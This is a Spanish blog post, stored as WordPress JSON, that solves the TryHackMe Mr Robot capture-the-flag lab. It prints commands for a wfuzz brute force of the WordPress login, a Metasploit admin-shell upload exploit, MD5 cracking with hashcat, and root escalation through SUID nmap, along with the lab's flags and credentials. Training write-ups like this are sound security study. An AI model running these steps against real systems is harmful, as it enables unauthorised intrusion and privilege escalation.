{"id":661,"date":"2020-01-09T02:33:26","date_gmt":"2020-01-09T01:33:26","guid":{"rendered":"https:\/\/www.pinguytaz.net\/?p=661"},"modified":"2020-01-09T02:33:28","modified_gmt":"2020-01-09T01:33:28","slug":"mr-robot-ctf-tryhackme","status":"publish","type":"post","link":"https:\/\/www.pinguytaz.net\/index.php\/2020\/01\/09\/mr-robot-ctf-tryhackme\/","title":{"rendered":"Mr Robot CTF (TryHackMe)"},"content":{"rendered":"\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-10.png\" alt=\"\" class=\"wp-image-663\" width=\"111\" height=\"156\"\/><\/figure><\/div>\n\n\n\n<p><a href=\"https:\/\/tryhackme.com\/room\/mrrobot\">CTF (Captura de bandera) Mr.Robot<\/a>, consiste en la localizaci\u00f3n de tres bandera y en este caso utilizaremos lo m\u00e1s posible la herramienta <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a> una de nuestras navajas suizas de pentesting. Ya vimos la captura de las banderas en otra entrada de esta misma p\u00e1gina, en esta ocasi\u00f3n la realizaremos con otros m\u00e9todos como es el uso de la herramienta <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a> y aplicaremos una vulnerabilidad para el acceso algo distinta.<\/p>\n\n\n\n<p>Lo primero sera unirnos a la habitaci\u00f3n de Mr.Robot y realizar nuestra conexi\u00f3n OpenVPN a la red de  \u00ab<a href=\"http:\/\/www.tryhackme.com\">TryHackMe<\/a>\u00bb para as\u00ed poder despegarla maquina durante una hora.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeraci\u00f3n<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -O -sS -Pn -sV &lt;IP asignada><\/code><\/pre>\n\n\n\n<p> <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"619\" height=\"289\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-11.png\" alt=\"\" class=\"wp-image-665\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-11.png 619w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-11-300x140.png 300w\" sizes=\"auto, (max-width: 619px) 100vw, 619px\" \/><\/figure><\/div>\n\n\n\n<p>El sistema operativo no esta muy claro pero se ven dos puertos abiertos y uno cerrado, empezaremos con el puerto 80.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">80 HTTP<\/h3>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-12.png\" alt=\"\" class=\"wp-image-666\" width=\"324\" height=\"161\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-12.png 835w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-12-300x149.png 300w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-12-768x383.png 768w\" sizes=\"auto, (max-width: 324px) 100vw, 324px\" \/><\/figure><\/div>\n\n\n\n<p>En principio no vemos formularios ni nada, pero es el momento de empezar a usar \u00abWfuzz\u00bb, en esta ocasi\u00f3n usaremos un script de <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a>  llamado <em>links<\/em>  que nos permitir\u00e1 localizar enlaces de posible interes.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wfuzz -L -c --script=links -z list,index.html --hc 404 http:\/\/&lt;IP>\/FUZZ<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-13.png\" alt=\"\" class=\"wp-image-669\" width=\"456\" height=\"171\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-13.png 899w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-13-300x112.png 300w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-13-768x288.png 768w\" sizes=\"auto, (max-width: 456px) 100vw, 456px\" \/><\/figure><\/div>\n\n\n\n<p>En principio como posible inter\u00e9s tenemos los ficheros \u00ab.js\u00bb.<\/p>\n\n\n\n<p>Continuamos utilizando <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a>, es este caso para buscar ficheros y directorios de inter\u00e9s.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wfuzz -L -c -z file,bin\/ficheros\/fich_dir_web.txt --hc 404 http:\/\/&lt;IP>\/FUZZ<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-14.png\" alt=\"\" class=\"wp-image-670\" width=\"362\" height=\"179\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-14.png 615w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-14-300x148.png 300w\" sizes=\"auto, (max-width: 362px) 100vw, 362px\" \/><\/figure><\/div>\n\n\n\n<p>En esta ocasi\u00f3n vemos varios archivos interesantes como <em>.htaccess<\/em> pero no tenemos acceso, tambi\u00e9n podemos observar que al parecer tiene phpmyadmin que podr\u00eda ser un vector de ataque y robots.txt que lo primero que hacemos es ver su contenido y nos encontramos la referencia de dos fichero: fsocity.dic y  key-1-of-3.txt, este ultimo tiene toda la pinta de ser la primera bandera.<\/p>\n\n\n\n<p>Al cargar el fichero \u00abhttp:\/\/10.10.103.39\/key-1-of-3.txt\u00bb vemos que disponemos de la <strong>primera bandera<\/strong>, por lo que entregamos el contenido es \u00ab073403c8a58a1f80d943455fb30724b9\u00bb para validarlo.<\/p>\n\n\n\n<p>Al ver el otro fichero \u00abfsocity.dic\u00bb vemos que es un diccionario de palabras que alguna podr\u00eda ser usuarios o claves, lo primero que hacemos es bajarlo a nuestra maquina para eliminar los duplicados y as\u00ed generarnos un diccionario.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl -o fsocity.dic http:\/\/&lt;IP>\/fsocity.dic\ncat fsocity.dic | sort | uniq > fsocity_unicos.dic<\/code><\/pre>\n\n\n\n<p> Continuamos utilizando <a href=\"https:\/\/wfuzz.readthedocs.io\/\">wfuzz<\/a>, en este caso para intentar descubrir el tipo de CMS.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-15.png\" alt=\"\" class=\"wp-image-671\" width=\"332\" height=\"86\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-15.png 663w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-15-300x78.png 300w\" sizes=\"auto, (max-width: 332px) 100vw, 332px\" \/><\/figure><\/div>\n\n\n\n<p>Continuamos utilizando nuestra herramienta <a href=\"https:\/\/wfuzz.readthedocs.io\/\">wfuzz<\/a>, en este caso lanzamos los payloads para localizar directorios y ficheros de paneles de administraci\u00f3n.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wfuzz -L -c -z file,\/usr\/share\/wfuzz\/wordlist\/general\/admin-panels.txt --hc 404 http:\/\/&lt;IP>\/FUZZ<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-16.png\" alt=\"\" class=\"wp-image-672\" width=\"304\" height=\"114\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-16.png 701w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-16-300x112.png 300w\" sizes=\"auto, (max-width: 304px) 100vw, 304px\" \/><\/figure><\/div>\n\n\n\n<p>Al encontrar el archivo wp-login.php, fichero de <a href=\"https:\/\/es.wordpress.com\/\">WordPress<\/a>, por lo que lanzamos otro escaneo con ficheros y directorios propios de <a href=\"https:\/\/es.wordpress.com\/\">WordPress<\/a> para confirmarlo.<\/p>\n\n\n\n<p>Al saber el acceso para la la administraci\u00f3n del panel de wordpress \u00abwp-login.php\u00bb intentamos localizar el usuario y clave por fuerza bruta, con <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a>, utilizando el ficheros reducido \u00abfsocity_unicos.dic\u00bb que hemos creado.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-17-1024x271.png\" alt=\"\" class=\"wp-image-674\" width=\"520\" height=\"137\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-17-1024x271.png 1024w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-17-300x80.png 300w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-17-768x204.png 768w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-17.png 1215w\" sizes=\"auto, (max-width: 520px) 100vw, 520px\" \/><\/figure><\/div>\n\n\n\n<p>Lo primero que hacemos es ver el codigo del formulario que obtendremos bajando la p\u00e1gina con \u00abcurl http:\/\/10.10.103.39\/wp-login.php -o Login.php\u00bb y en ella vemos que la solicitud es POST a \u00abhttp:\/\/&lt;IP>\/wp-login.php con los argumentos:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong><em>log<\/em><\/strong> contendr\u00e1 el nombre del usuario.<\/li><li><strong><em>pwd<\/em><\/strong> tendra el pasword.<\/li><\/ul>\n\n\n\n<p>sabemos que <a href=\"https:\/\/es.wordpress.com\/\">WordPress<\/a> cuando el usuario es invalido dar\u00e1 el mensaje  \u00ab<em>Invalid username<\/em>\u00bb as\u00ed que ejecutaremos <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a> indic\u00e1ndole los usuarios del fichero y la clave la ponemos como fija a \u00ab<em>nada<\/em>\u00ab<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wfuzz -c -z file,fsocity_unicos.dic --hs \"Invalid username\" -d \"log=FUZZ&amp;pwd=nada\" http:\/\/&lt;IP>\/wp-login.php<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-18.png\" alt=\"\" class=\"wp-image-675\" width=\"306\" height=\"73\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-18.png 632w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-18-300x72.png 300w\" sizes=\"auto, (max-width: 306px) 100vw, 306px\" \/><\/figure><\/div>\n\n\n\n<p>Vemos que se encuentran tres usuarios, pero es el mismo ya que <a href=\"https:\/\/es.wordpress.com\/\">WordPress<\/a> no diferencia entre may\u00fasculas y min\u00fasculas en los usuarios, por lo tanto el usuario localizado es \u00ab<em>elliot<\/em>\u00ab.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-19.png\" alt=\"\" class=\"wp-image-676\" width=\"391\" height=\"70\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-19.png 625w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-19-300x54.png 300w\" sizes=\"auto, (max-width: 391px) 100vw, 391px\" \/><\/figure><\/div>\n\n\n\n<p>Con el usuario encontrado intentamos buscar la clave de este, tambi\u00e9n con <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a>, en este caso sabemos que el mensaje que nos da cuando el usuario es correcto y no la clave es \u00abThe password&#8230;\u00b7 por lo que el comando que lanzaremos en este caso es:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wfuzz -c -z file,fsocity_unicos.dic --hs \"The password\" -d \"log=elliot&amp;pwd=FUZZ\" http:\/\/&lt;IP>\/wp-login.php<\/code><\/pre>\n\n\n\n<p>Vemos que el usuario localizado es \u00ab<em>ER28-0652<\/em>\u00bb al entrar podemos comprobar que no es un usuario cualcquiera sino que dispone de permiso de administrador, con este acceso podemos instalar una p\u00e1gina PHP con un <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/07\/30\/resolviendo-ctf-mr-robot\/\">BackDoor como realizamos anteriormente<\/a> o utilizar un <em>exploit<\/em> desde <a href=\"https:\/\/www.metasploit.com\/\">MetaSploit<\/a>, que es lo que realizaremos.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Esplotaci\u00f3n<\/h2>\n\n\n\n<p>Utilizaremos el exploit \u00abexploit\/unix\/webapp\/wp_admin_shell_upload\u201d ya que disponemos del usuario y la clave, cargara un Backdoor y lo ejecutara para que podamos tener un Shell.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\nmsf5> use exploit\/unix\/webapp\/wp_admin_shell_upload\nmsf5> set PASSWORD ER28-0652\nmsf5> set USERNAME elliot\nmsf5> set rhosts 10.10.247.146\n\n\/\/ Opciones Avanzadas show advanced options\nmsf5> set wpcheck false     \/\/ Chequea si es un wordpress valido.\nmsf5> set HttpPartialResponses true   \/\/ Evita error en la carga del payload<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-20.png\" alt=\"\" class=\"wp-image-680\" width=\"487\" height=\"142\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-20.png 943w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-20-300x88.png 300w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-20-768x225.png 768w\" sizes=\"auto, (max-width: 487px) 100vw, 487px\" \/><\/figure><\/div>\n\n\n\n<p>Logrando la sesi\u00f3n de meterpreter lo que hacemos es obtener un shell y poner el prompt \u00abpython -c &#8216;import pty; pty.spawn(\u00ab\/bin\/bash\u00bb);'\u00bb de este para que nos sea m\u00e1s c\u00f3modo la navegaci\u00f3n por los directivos en busca de la bandera e informaci\u00f3n para escalada de privilegios.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ id   \/\/ Obtenemos que estamos con el usuario daemon\n$ cd \/home  \/amos al directorio de usuarios.\nls -la   \/\/Vemos que existe el directorio de robot.\ncd robot   \/\/ Entramos en el y miramos\nls -la<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-21.png\" alt=\"\" class=\"wp-image-683\" width=\"421\" height=\"119\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-21.png 553w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-21-300x85.png 300w\" sizes=\"auto, (max-width: 421px) 100vw, 421px\" \/><\/figure><\/div>\n\n\n\n<p> <\/p>\n\n\n\n<p>Localizamos la segunda bandera \u00abkey-2-of-3.txt\u00bb pero no tenemos permiso de lectura ya que es del usuario robot, lo que si podemos visualizar es el fichero \u00abpassword.raw.md5\u00bb (robot:c3fcd3d76192e4007dfb496cca67e13b) que seg\u00fan la extensi\u00f3n es MD5, as\u00ed que lo decodificaremos para ver si es la clave del usuario \u00abrobot\u00bb.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -m 0 --force c3fcd3d76192e4007dfb496cca67e13b \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<p>Obtenemos \u00ababcdefghijklmnopqrstuvwxyz\u00bb y lo probamos con el comando \u00ab<em>su &#8211; robot<\/em>\u00ab, nos deja entrar y al tener ya permisos de usuarios de \u00ab<em>robot<\/em>\u00bb visualizamos el fichero \u00abkey-2-of-3.txt\u00bb y obtenemos la <strong>segunda bandera \u00ab822c73956184f694993bede3eb39f959\u00bb<\/strong><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"453\" height=\"99\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-22.png\" alt=\"\" class=\"wp-image-686\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-22.png 453w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-22-300x66.png 300w\" sizes=\"auto, (max-width: 453px) 100vw, 453px\" \/><\/figure><\/div>\n\n\n\n<p>Realizamos un \u00abfind \/ -name \u00abkey-?-of-3.txt -print\u00bb lo que nos permite ver que la tercera bandera esta en \u00ab\/root\/key-3-of-3.txt\u00bb pero para verlo necesitamos escalar privilegios hasta root.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Escalada de privilegios<\/h2>\n\n\n\n<p>Podriamos utilizar el modulo de enumeraci\u00f3n de vectores de escalada de privilegios, creado para <a href=\"https:\/\/www.metasploit.com\/\">MetaSploit<\/a>, \u00abenum_vectores_escalada\u00bb ya que disponemos de una sesi\u00f3n de meterpreter pero en este caso realizaremos directamente la b\u00fasqueda de SUID ya que conocemos el error de seguridad de nuestro pentesting anterior.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/ -perm -u=s -type f 2> \/dev\/null<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-23.png\" alt=\"\" class=\"wp-image-689\" width=\"283\" height=\"204\" srcset=\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-23.png 483w, https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2020\/01\/image-23-300x217.png 300w\" sizes=\"auto, (max-width: 283px) 100vw, 283px\" \/><\/figure><\/div>\n\n\n\n<p>Detectamos varios ficheros pero nos fijamos en \u00ab<em>nmap<\/em>\u00bb que nos permite ejecutar comandos de forma interactiva y as\u00ed podremos ejecutar un Shell, lo mismo que podemos realizar con \u00ab<em>vi<\/em>\u00bb lo que nos permitir\u00e1 gracias al permiso SUID que nos abra una Shell con permiso root.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ \/usr\/local\/bin\/nmap --interactive\nnmap> !sh<\/code><\/pre>\n\n\n\n<p>Una vez que tenemos un prompt con superusuario realizaremos un \u00ab<em>cat<\/em>\u00bb del fichero \/root\/key-3-of-3.txt y nos da la <strong>tercera bandera (04787ddef27c3dee1ee161b21670b4e4)<\/strong><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Con esto finalizamos esta captura de bandera que aunque repetida la hemos realizado de una forma distinta y se ha podido ver la herramienta <a href=\"https:\/\/www.pinguytaz.net\/index.php\/2019\/10\/18\/wfuzz-navaja-suiza-del-pentesting-web-1-3\/\">WFuzz<\/a> en acci\u00f3n.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CTF (Captura de bandera) Mr.Robot, consiste en la localizaci\u00f3n de tres bandera y en este caso utilizaremos lo m\u00e1s posible la herramienta WFuzz una de nuestras navajas suizas de pentesting. Ya vimos la captura de las banderas en otra entrada de esta misma p\u00e1gina, en esta ocasi\u00f3n la realizaremos con otros m\u00e9todos como es el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":663,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[110,19,78,16],"tags":[80,109,90],"class_list":["post-661","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-escalar-privilegios","category-metasploit","category-seguridad","tag-metasploit","tag-wfuzz","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts\/661","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/comments?post=661"}],"version-history":[{"count":14,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts\/661\/revisions"}],"predecessor-version":[{"id":690,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts\/661\/revisions\/690"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/media\/663"}],"wp:attachment":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/media?parent=661"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/categories?post=661"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/tags?post=661"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}